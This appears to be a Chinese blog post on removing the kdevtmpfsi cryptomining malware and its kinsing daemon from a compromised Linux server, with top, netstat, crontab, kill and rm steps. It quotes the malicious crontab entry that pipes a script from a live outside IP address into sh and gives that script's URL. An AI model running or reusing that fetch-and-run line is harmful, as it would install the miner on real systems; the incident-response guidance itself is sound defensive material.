kdevtmpfsi挖矿病毒以及他的守护进程kinsing 已完美解决 亲测 |
您所在的位置:网站首页 › 挖矿病毒进程 › kdevtmpfsi挖矿病毒以及他的守护进程kinsing 已完美解决 亲测 |
服务器CPU资源占用一直处于100%的状态,检查发现是kdevtmpfsi占用导致的,此进程为挖矿程序。 处理步骤如下: kdevtmpfsi 进程处理: 1、# top 查看cpu占用情况,找到占用cpu的进程 最后是 kdevtmpfsi 2、# netstat -natp 根据上面的进程名查看与内网的 tcp 链接异常 ,看到陌生ip,查出为国外ip,估计主机被人种后门了 此时,挖矿脚本大概率定时在你的crontab里面。 crontab -l ,发现异常定时任务,* * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1 有兴趣可以研究这个sh脚本 http://195.3.146.118/unk.sh 3、解决方法 kdevtmpfsi有守护进程,单独kill掉 kdevtmpfsi 进程会不断恢复占用。守护进程名称为 kinsing,需要kill后才能解决问题。 #查询关联的守护进程 [root@iZwz97v9b9ili0mz7rl188Z overlay2]# systemctl status 2854 ● session-5649.scope - Session 5649 of user root Loaded: loaded (/run/systemd/system/session-5649.scope; static; vendor preset: disabled) Drop-In: /run/systemd/system/session-5649.scope.d └─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions\x2eservice.conf, 50-Description.conf, 50-SendSIGHUP.conf, 50-Slice.conf, 50-TasksMax.conf Active: active (abandoned) since 一 2019-12-23 10:41:33 CST; 2 days ago CGroup: /user.slice/user-0.slice/session-5649.scope ├─ 2854 /tmp/kdevtmpfsi └─18534 ./kinsing1oZIY4Aid7 具体命令: systemctl status 23437 ps -aux | grep kinsing ps -aux | grep kdevtmpfsi kill -9 23437 kill -9 18534 cd /tmp ls rm -rf kdevtmpfsi rm -rf /var/tmp/kinsing 记得这个守护进程的文件也要删掉,找不到的话,也可以用这个命令 find / -name kdevtmpfsi find / -name kinsing 进入/var/spool/cron 查看是否有相关的木马定时任务在执行 有的话删掉再重启下crontab
|
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |